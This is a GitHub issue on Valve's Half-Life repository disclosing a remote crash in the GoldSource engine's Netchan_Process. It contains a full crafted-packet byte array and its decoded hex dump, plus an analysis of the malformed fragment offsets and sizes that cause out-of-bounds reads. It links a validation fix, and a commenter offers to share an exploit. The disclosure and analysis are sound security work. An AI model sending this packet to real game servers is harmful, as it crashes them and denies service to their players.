ValveSoftware / halflife

Half-Life 1 engine based games

[GoldSource] Netchan_process remote crash server #2139

Open SkillartzHD opened 5 years ago

SkillartzHD commented 5 years ago

This shellcode (a crafted network packet) crashes the server through Netchan_Process in the netchan code.

public byte[] Netchan_Process = new byte[] { 0xb9,0x6a,0x85,0xca,0xcb,0xeb,0x17,0x91,0x40,0x78,0x7f,0x76,0xb3,0x01,0x13,0xa1, 0xa0,0x01,0x49,0xb8,0xab,0x73,0x48,0x02,0x49,0x5a,0x53,0xff,0x41,0x41,0xe8,0xcb, 0x1c,0x41,0x7e,0xe9,0x88,0x48,0x2c,0x00,0xe8,0xd3,0x42,0x2c,0x00,0x00,0x00,0x41, 0x6e,0x0f,0x84,0x02,0x49,0x2c,0x00,0x2d,0x46,0x56,0x55,0x00,0x00,0x00,0x00,0x50, 0x61,0x0f,0x84,0xfd,0x48,0x2c,0x00,0x68,0x20,0x54,0x65,0x73,0x0f,0x84,0x96,0x48, 0x36,0x6c,0x23,0x3f,0x20,0x35,0x2b,0x6b,0x36,0x3c,0x66,0x93,0x92,0x41,0x30,0x72, 0x27,0xc6,0x96,0x17,0xb6,0x97,0x82,0x76,0xb7,0x17,0xc2,0x17,0xc6,0xf6,0x62,0x27, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0x2c,0x00,0x02,0x46,0x54,0x23,0x46,0x52,0x43,0x46,0x54,0x65,0x36,0x40,0x43,0xd6, 0x57,0xc2,0xe6,0x17,0xc2,0x16,0xf7,0x02,0x67,0x92,0xb2,0x37,0x12,0x76,0x97,0xb3, 0x44,0x30,0x73,0x02,0xc7,0x96,0x12,0xb7,0x16,0x82,0x77,0x16,0x17,0xc6,0x16,0xc6, 0xf3,0xe2,0x27,0x91,0xb4,0x02,0x37,0x32,0x13,0x66,0xb2,0xc5,0x82,0x02,0x23,0xe6, 0xc6,0x62,0xb7,0x07,0x63,0x56,0x15,0xe5,0x87,0x46,0x63,0x47,0xe6,0xc6,0x37,0x52, 0x07,0x52,0xb6,0xb7,0x62,0xc6,0x63,0xb2,0x57,0x62,0xe4,0x77,0x43,0x13,0x07,0x13, 0xc2,0x40,0x47,0x52,0x57,0xc6,0xe2,0x17,0xc6,0x16,0xf7,0x26,0xe7,0x96,0xb6,0x97, 0x96,0x76,0x97,0x17,0xc4,0x34,0x77,0xa2,0x43,0x96,0x12,0x13,0x16,0x86,0x73,0x16, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 
0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0x2c,0x00,0x02,0x46,0x54,0x23,0x46,0x52,0x43,0x46,0x54,0x65,0x36,0x40,0x43,0xd6, 0x57,0xc2,0xe6,0x17,0xc2,0x16,0xf7,0x02,0x67,0x92,0xb2,0x37,0x12,0x76,0x97,0xb3, 0x44,0x30,0x73,0x02,0xc7,0x96,0x12,0xb7,0x16,0x82,0x77,0x16,0x17,0xc6,0x16,0xc6, 0xf3,0xe2,0x27,0x91,0xb4,0x02,0x37,0x32,0x13,0x66,0xb2,0xc5,0x82,0x02,0x23,0xe6, 0xc6,0x62,0xb7,0x07,0x63,0x56,0x15,0xe5,0x87,0x46,0x63,0x47,0xe6,0xc6,0x37,0x52, 0x07,0x52,0xb6,0xb7,0x62,0xc6,0x63,0xb2,0x57,0x62,0xe4,0x77,0x43,0x13,0x07,0x13, 0xc2,0x40,0x47,0x52,0x57,0xc6,0xe2,0x17,0xc6,0x16,0xf7,0x26,0xe7,0x96,0xb6,0x97, 0x96,0x76,0x97,0x17,0xc4,0x34,0x77,0xa2,0x43,0x96,0x12,0x13,0x16,0x86,0x73,0x16, 0x93,0xc2,0x16,0x62,0xf7,0xe6,0x23,0x95,0xb1,0x06,0x33,0x17,0x16,0x66,0xb7,0xc6, 0x83,0x02,0x26,0xe7,0xc2,0x66,0xb6,0x26,0xe7,0x52,0x14,0x41,0x03,0x42,0x67,0xe3, 0x62,0xc6,0x33,0xd6,0x07,0x56,0xb2,0xc8,0x66,0xc6,0x63,0x96,0xd7,0x66,0xe0,0xd7, 0xc7,0x13,0x07,0xb7,0x42,0x44,0x43,0xf2,0xd3,0xc6,0xe2,0xb3,0xc6,0x12,0xf3,0x26, 0x63,0x92,0xb3,0x7b,0x39,0x26,0x6b,0x34,0x28,0x30,0x62,0x2e,0x7c,0x66,0x6b,0x60, 0x26,0x75,0x61,0x0e,0x18,0x74,0x26,0x74,0x7e,0x2c,0x23,0x77,0x68,0x35,0x6b,0x21, 0x36,0x6c,0x26,0x79,0x65,0x36,0x2e,0x07,0x3c,0x71,0x70,0x3b,0x34,0x74,0x04,0x7d, 0x7d,0x6c,0x6e,0x7b,0x6c,0x71,0x2f,0x62,0x76,0x29,0x6b,0x71,0x21,0x67,0x69,0x2b, 0x74,0x53,0x47,0x72,0x3c,0x29,0x61,0x39,0x21,0x78,0x27,0x21,0x79,0x6c,0x61,0x76, 0x7f,0x3e,0x62,0x69,0x1b,0x10,0x23,0x71,0x71,0x26,0x2b,0x7e,0x20,0x70,0x62,0x24, 0x3c,0x66,0x2b,0x20,0x2e,0x35,0x21,0x04,0x58,0x34,0x66,0x34,0x3e,0x7c,0x63,0x35, 0x38,0x65,0x6b,0x71,0x66,0x7c,0x26,0x29,0x75,0x26,0x6e,0x15,0x24,0x71,0x30,0x21, 0x7c,0x84,0x44,0x37,0x35,0x2c,0x6e,0x33,0x2c,0x71,0x6f,0x22,0x76,0x69,0x6b,0x73, 0x69,0x67,0x29,0x61,0x7c,0x13,0x47,0x78,0x74,0x29,0x21,0x73,0x29,0x38,0x27,0x2b, 0x39,0x6c,0x2c,0x27,0x2e,0x22,0x33,0x03,0x50,0x23,0x6b,0x31,0x34,0x65,0x54,0x34, 
0x65,0x5c,0x90,0x30,0x62,0x34,0x74,0x66,0x6b,0x6a,0x2e,0x75,0x21,0x04,0x10,0x24, 0x66,0x7c,0x26,0x7c,0x23,0x2f,0x30,0x35,0x2b,0x7b,0x36,0x2c,0x66,0x7b,0x25,0x76, 0x6e,0x47,0x74,0x61,0x70,0x71,0x64,0x74,0x04,0x2d,0x7d,0x7c,0x2e,0x7b,0x74,0x21, 0x2f,0x7a,0x2e,0x39,0x6b,0x29,0x31,0x77,0x69,0x3b,0x64,0x53,0x47,0x62,0xb7,0x17, 0xe2,0xc2,0x63,0x12,0xd3,0x66,0xe4,0xd3,0x46,0x13,0x03,0x16,0xc1,0x44,0x42,0x73, 0xd3,0xc6,0xe3,0xb3,0x47,0x16,0xf3,0x87,0xe6,0x96,0xb7,0x96,0x16,0x76,0x96,0xb7, 0x44,0x30,0x77,0x02,0xc7,0x92,0x12,0xb7,0x13,0x86,0x77,0x13,0x92,0xc6,0x13,0x43, 0xe6,0x22,0x31,0x30,0x06,0x37,0xb6,0x17,0x66,0xb6,0xc7,0x03,0x02,0x27,0x47,0x42, 0x62,0xb6,0x86,0x63,0x56,0x14,0xe5,0x06,0x42,0x63,0xe6,0x63,0xc2,0x36,0xf7,0x83, 0x56,0xb3,0x13,0xe7,0xc6,0x67,0x37,0xd6,0x66,0xe1,0xd6,0x47,0x13,0x06,0x17,0xc2, 0x40,0x43,0x52,0x57,0xc2,0xe2,0x17,0xc2,0x12,0xf7,0x23,0x62,0x96,0xb3,0x12,0x16, 0x72,0x92,0xb7,0x40,0x30,0x77,0x26,0x47,0x96,0x16,0x17,0x97,0x86,0x77,0xb7,0x12, 0xc2,0x17,0xe3,0xf7,0xe6,0x22,0x95,0x30,0x02,0x33,0xb6,0x93,0x62,0xb6,0x63,0x07, 0x06,0x23,0x43,0x47,0x66,0xb2,0xa3,0x66,0x56,0x11,0xe0,0x07,0x42,0x66,0xe7,0x62, 0xc6,0x37,0xd6,0x07,0x52,0xb2,0xb7,0x63,0xc2,0x63,0x93,0x52,0x66,0xe5,0x52,0x47, 0x17,0x02,0x17,0xc6,0x40,0x43,0x76,0xd7,0xc6,0xe6,0xb7,0x47,0x12,0xf7,0x87,0xe2, 0x92,0xb7,0xb2,0x92,0x72,0x92,0x13,0x40,0x34,0x73,0x26,0xc4,0x92,0x16,0xb3,0x93, 0x82,0x73,0xb3,0x17,0xc6,0x13,0xc6,0xf2,0xe6,0x27,0x90,0x31,0x02,0x36,0xb7,0x92, 0x66,0xb7,0x42,0x83,0x02,0x25,0x61,0x56,0x40,0x74,0x66,0x2e,0x76,0x6c,0x63,0x7f, 0x28,0x75,0x6b,0x61,0x7e,0x7c,0x26,0x33,0x7d,0x26,0x2e,0x1f,0x2c,0x51,0x70,0x2b, 0x3c,0x64,0x44,0x77,0x65,0x3c,0x26,0x61,0x34,0x31,0x6f,0x38,0x36,0x79,0x6b,0x39, 0xc6,0x37,0xd6,0x07,0x52,0xb2,0xb7,0x63,0xc2,0x63,0x93,0x52,0x66,0xe5,0x52,0x47, 0x17,0x02,0x17,0xc6,0x40,0x43,0x76,0xd7,0xc6,0xe6,0xb7,0x47,0x12,0xf7,0x87,0xe2, 0x92,0xb7,0xb2,0x92,0x72,0x92,0x13,0x40,0x34,0x73,0x26,0xc4,0x92,0x16,0xb3,0x93, 
0x82,0x73,0xb3,0x17,0xc6,0x13,0xc6,0xf2,0xe6,0x27,0x90,0x31,0x02,0x36,0xb7,0x92, 0x66,0xb7,0x42,0x83,0x02,0x25,0x61,0x56,0x40,0x74,0x66,0x2e,0x76,0x6c,0x63,0x7f, 0x28,0x75,0x6b,0x61,0x7e,0x7c,0x26,0x33,0x7d,0x26,0x2e,0x1f,0x2c,0x51,0x70,0x2b, 0x3c,0x64,0x44,0x77,0x65,0x3c,0x26,0x61,0x34,0x31,0x6f,0x38,0x36,0x79,0x6b,0x39, 0xc6,0x37,0xd6,0x07,0x52,0xb2,0xb7,0x63,0xc2,0x63,0x93,0x52,0x66,0xe5,0x52,0x47, 0x17,0x02,0x17,0xc6,0x40,0x43,0x76,0xd7,0xc6,0xe6,0xb7,0x47,0x12,0xf7,0x87,0xe2, 0x92,0xb7,0xb2,0x92,0x72,0x92,0x13,0x40,0x34,0x73,0x26,0xc4,0x92,0x16,0xb3,0x93, 0x82,0x73,0xb3,0x17,0xc6,0x13,0xc6,0xf2,0xe6,0x27,0x90,0x31,0x02,0x36,0xb7,0x92, 0x66,0xb7,0x42,0x83,0x02,0x25,0x61,0x56,0x40,0x74,0x66,0x2e,0x76,0x6c,0x63,0x7f, 0x28,0x75,0x6b,0x61,0x7e,0x7c,0x26,0x33,0x7d,0x26,0x2e,0x1f,0x2c,0x51,0x70,0x2b, 0x3c,0x64,0x44,0x77,0x65,0x3c,0x26,0x61,0x34,0x31,0x6f,0x38,0x36,0x79,0x6b,0x39, 0x79,0x77,0x29,0x71,0x64,0x13,0x47,0x62,0x7c,0x29,0x61,0x79,0x21,0x78,0x67,0x21, 0x79,0x3c,0x21,0x76,0x27,0x66,0x62,0x31,0x43,0x10,0x63,0x2b,0x79,0x66,0x6b,0x76, 0x60,0x30,0x62,0x64,0x74,0x76,0x2b,0x6a,0x36,0x25,0x21,0x1c,0x48,0x34,0x66,0x24, 0x36,0x6c,0x23,0x3f,0x20,0x35,0x2b,0x6b,0x36,0x3c,0x66,0x93,0x92,0x41,0x30,0x72, 0x27,0xc6,0x96,0x17,0xb6,0x97,0x82,0x76,0xb7,0x17,0xc2,0x17,0xc6,0xf6,0x62,0x27, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0x36,0x6c,0x23,0x3f,0x20,0x35,0x2b,0x6b,0x36,0x3c,0x66,0x93,0x92,0x41,0x30,0x72, 0x27,0xc6,0x96,0x17,0xb6,0x97,0x82,0x76,0xb7,0x17,0xc2,0x17,0xc6,0xf6,0x62,0x27, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 
0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0xc2,0xf9,0x1b,0x00,0x63,0x71,0x69,0x76,0xf6,0x67,0x86,0x06,0x27,0xce,0xc7,0x62, 0xce,0xce };

Splatt581 commented 5 years ago

This shellcode really can crash the server if a game client sends it after connecting. In decrypted form, it looks like this:

0000 0010:  cf 7f 60 a3 58 03 01 10 01 09 11 19 fb 58 33 00  ..`.X... .....X3.
0000 0020:  06 03 4a b0 72 a8 11 e8 50 6e 01 f7 b9 2c 58 71  ..J.r... Pn...,Xq
0000 0030:  95 52 db 41 b8 10 18 b3 fb c4 17 cd 94 50 64 e8  .R.A.... .....Pd.
0000 0040:  f9 55 06 b5 a9 50 00 e9 44 d4 57 d8 d1 10 74 ab  .U...P.. D.W...t.
0000 0050:  ca 65 4c c3 b1 86 84 ac ff 42 10 95 ab 56 63 ff  .eL..... .B...Vc.
0000 0060:  9c 04 56 ba 6f 03 10 9f ae f6 82 bc bb f7 06 3b  ..V.o... .......;
0000 0070:  8e a2 9a ce 4a 87 6e a1 fb 33 28 e7 0e 42 de 66  ....J.n. .3(..B.f
0000 0080:  ef 77 d2 e5 3f 46 c6 fe 28 77 ba 4a 8b 27 5a 57  .w..?F.. (w.J.'ZW
0000 0090:  7c b2 7e f0 1f 33 02 21 be f7 72 7f 1c 05 16 c8  |.~..3.! ..r.....
0000 00a0:  be 33 56 7e eb 77 96 4f 0e a6 12 ec 0b 63 d6 9b  .3V~.w.O .....c..
0000 00b0:  ce f4 6a fe ea 17 0b f0 ab 07 58 61 ae b2 8e f6  ..j..... ..Xa....
0000 00c0:  df f7 46 35 6e e6 96 0e ae c7 2e 2f 1b 67 6c 27  ..F5n... .../.gl'
0000 00d0:  aa 12 8e a0 ef 63 86 b5 db 56 d2 2a 6c 33 a6 5c  .....c.. .V.*l3.\
0000 00e0:  ee 63 16 48 7f f7 36 bf 5e 36 42 68 9f b6 76 3b  .c.H..6. ^6Bh..v;
0000 00f0:  f8 04 5a 4e 1a 77 5a b0 2f 73 de c1 71 e2 1e a6  ..ZN.wZ. /s..q...
0000 0100:  6f 63 96 95 2e b0 66 3e 0e 57 4b 7e 4b 53 1c a1  oc....f> .WK~KS..
0000 0110:  0a e2 de 30 df e3 12 65 c2 f3 82 da cd 7b 66 92  ...0...e .....{f.
0000 0120:  d7 32 20 d1 d9 2b 36 d5 b7 71 35 cd cd 26 64 e1  .2...+6. .q5..&d.
0000 0130:  ce 33 24 d7 d8 7b 2d db 80 66 74 95 be 7e 7e c4  .3$..{ . .ft..~~.
0000 0140:  c2 70 21 cf 84 54 74 dd c2 3e 34 c4 db 3f 29 8f  .p!..Tt. .>4..?).
0000 0150:  c8 6b 31 95 d2 79 67 82 cb 07 43 cd c0 71 69 97  .k1..yg. ..C..qi.
0000 0160:  d8 77 68 d8 cf 21 3c d0 d0 72 7e 94 c8 23 00 e2  .wh..!<. .r~..#..
0000 0170:  c7 3b 2e d8 dd 72 68 93 d9 6b 7e 9f bd 71 7d 8f  .;...rh. .k~..q}.
0000 0180:  cd 66 64 ab cc 33 7c d7 c8 3b 3d 81 90 36 24 85  .fd..3|. .;=..6$.
0000 0190:  ac 6e 3e 96 d8 20 71 87 8e 04 94 c5 ca 7e 6c 9e  .n>...q. .....~l.
0000 01a0:  db 3f 61 d5 ca 2b 39 df d8 39 27 82 c1 47 03 85  .?a..+9. .9'..G..
0000 01b0:  ca 31 21 dd d2 37 20 9a de 6c 74 9a ba 63 6a 8f  .1!..7.. .lt..cj.
0000 01c0:  c8 6b 73 a3 cd 04 65 dd 89 c0 04 dc df 64 6c 81  .ks...e. .....dl.
0000 01d0:  cc 2e 72 88 dd 00 04 82 c5 66 6c df cc 20 6f 88  ..r..... .fl...o.
0000 01e0:  d5 66 6b d2 cf 65 2b cf d8 64 07 85 cd 64 61 89  .fk..e+. .d...da.
0000 01f0:  c5 6d 25 ad d8 64 63 9d c0 6e 62 8c ce 61 61 ca  .m%..dc. .nb..aa.
0000 0200:  aa 64 6b 9a ee e7 62 ae ab 33 9a 5b 6a f4 3e 30  .dk...b. .3.[j.>0
0000 0210:  af 03 0b a5 8a 52 44 62 0a a3 d6 6a 7e e3 56 ec  .....RDb ...j~.V.
0000 0220:  6f e7 86 1f 0e d6 26 bf bb 67 70 af 0e 12 82 3e  o.....&. .gp....>
0000 0230:  aa 67 8e ba ba 03 de 21 c9 71 3a 45 ae e6 7f a7  .g.....! .q:E....
0000 0240:  fa c7 e6 95 bb 17 27 eb da d6 ee db bf f5 4c b5  ......'. ......L.
0000 0250:  da e6 7b a1 7a e7 36 61 5e 53 a3 ef 2f 27 27 6d  ..{.z.6a ^S../''m
0000 0260:  be 86 f1 9f 7b 57 56 ba ee 42 03 ab 7b 17 f2 3b  ....{WV. .B..{..;
0000 0270:  db 33 ff bb ef 02 ab 25 b9 f7 8a d1 fe 76 3f 91  .3.....% .....v?.
0000 0280:  6e 17 46 65 eb e7 77 6f 4e b3 4f 7b 89 85 7a 05  n.Fe..wo N.O{..z.
0000 0290:  2a b6 2b e1 fe 73 b6 c1 fe 03 33 bf 9f b3 f2 cd  *.+..s.. ..3.....
0000 02a0:  fe b0 01 af db a7 36 eb be c6 77 2d da b7 a2 ab  ......6. ..w ....
0000 02b0:  eb 83 6b 6b be 42 fd d5 3f 57 1a b4 6e 26 0b e1  ..kk.B.. ?W..n&..
0000 02c0:  be b7 b6 35 1b d7 f7 fb 2b e2 ef 2b f9 03 ca 91  ...5.... +..+....
0000 02d0:  7d 26 6b d7 6a a3 16 31 ae f3 63 3b 0b d6 53 6d  }&k.j..1 ..c;..Sm
0000 02e0:  c8 c0 37 1f 2b f7 66 ab 3a 52 f7 8d ef 61 35 fb  ..7.+.f. :R...a5.
0000 02f0:  97 76 7c e9 86 73 74 c5 98 2b 6d 8b 8a 76 34 df  .v|..st. .+m..v4.
0000 0300:  e6 2e 76 8e d2 20 51 c5 ce 14 3c 85 d8 36 64 86  ..v...Q. ..<..6d.
0000 0310:  81 6f 29 d7 c0 7b 79 95 c8 69 67 c0 9b 57 53 cf  .o)..{y. .ig..WS.
0000 0320:  80 31 39 85 98 27 28 88 cf 31 7c 92 88 62 76 de  .19..'(. .1|..bv.
0000 0330:  92 73 18 ea 8f 7b 7e ca 9d 22 28 c3 d3 7b 3e d5  .s...{~. ."(..{>.
0000 0340:  e5 21 75 c5 dd 36 34 a1 86 73 34 8f d2 3b 6d c3  .!u..64. .s4..;m.
0000 0350:  2a 66 24 d5 8b 20 41 31 ae d6 d6 9e 8f 92 d7 1d  *f$...A1 ........
0000 0360:  ee 92 07 4e 9e 22 a6 6f 8b 16 f5 5f 0a 62 86 ea  ...N.".o ..._.b..
0000 0370:  9f 12 8f cf 4b 76 5b d0 ec 16 7f 04 de 16 ce c0  ....Kv[. ........
0000 0380:  cf c2 37 b5 4e 06 02 1a df 92 3f 2b 98 72 0b 74  ..7.N... ..?+.r.t
0000 0390:  ba 17 5a 90 bf 50 c7 91 ce 86 46 ce 0f 06 07 bd  ..Z..P.. ..F.....
0000 03a0:  4e c2 87 7e 2e 36 c3 3e cb 20 85 d9 aa 92 d6 7a  N..~.6.> .......z
0000 03b0:  cf 96 1b 1f ea d6 0b a0 f9 5b e1 61 cf 39 39 c2  ........ .[.a.99.
0000 03ba:  ff 86 37 05 9b 97 ce ce ce ce                    ..7..... ..

In fact, it is a multifragment packet containing two fragments: a normal fragment and a file fragment. The fragment header fields break down as follows (the two-byte fields are little-endian, so 7f 60 reads as 0x607f): cf - flag indicating the presence of a normal fragment in the packet; 7f 60 - total number of fragments in the stream of normal fragments (24703); a3 58 - current fragment in the stream of normal fragments (22691); 03 01 - normal fragment offset (259); 10 01 - normal fragment size (272); 09 - flag indicating the presence of a file fragment in the packet; 11 19 - total number of fragments in the stream of file fragments (6417); fb 58 - current fragment in the stream of file fragments (22779); 33 00 - file fragment offset (51); 06 03 - file fragment size (774). The fragment bodies follow these fields.

From what I have observed, the server crashes because the offset fields are set incorrectly (the file fragment's offset should not be less than the normal fragment's offset, since the file fragment follows it), as are the fragment sizes, so that reading the data goes beyond the end of the packet. It seems that additional checks need to be added to Netchan_Validate. You can see them here: https://github.com/dreamstalker/rehlds/blob/65c6ce593b5eabf13e92b03352e4b429d0d797b0/rehlds/engine/net_chan.cpp#L648-L673

@mikela-valve I can provide an exploit that uses this vulnerability if it is needed, because this cannot be done through a pure game client.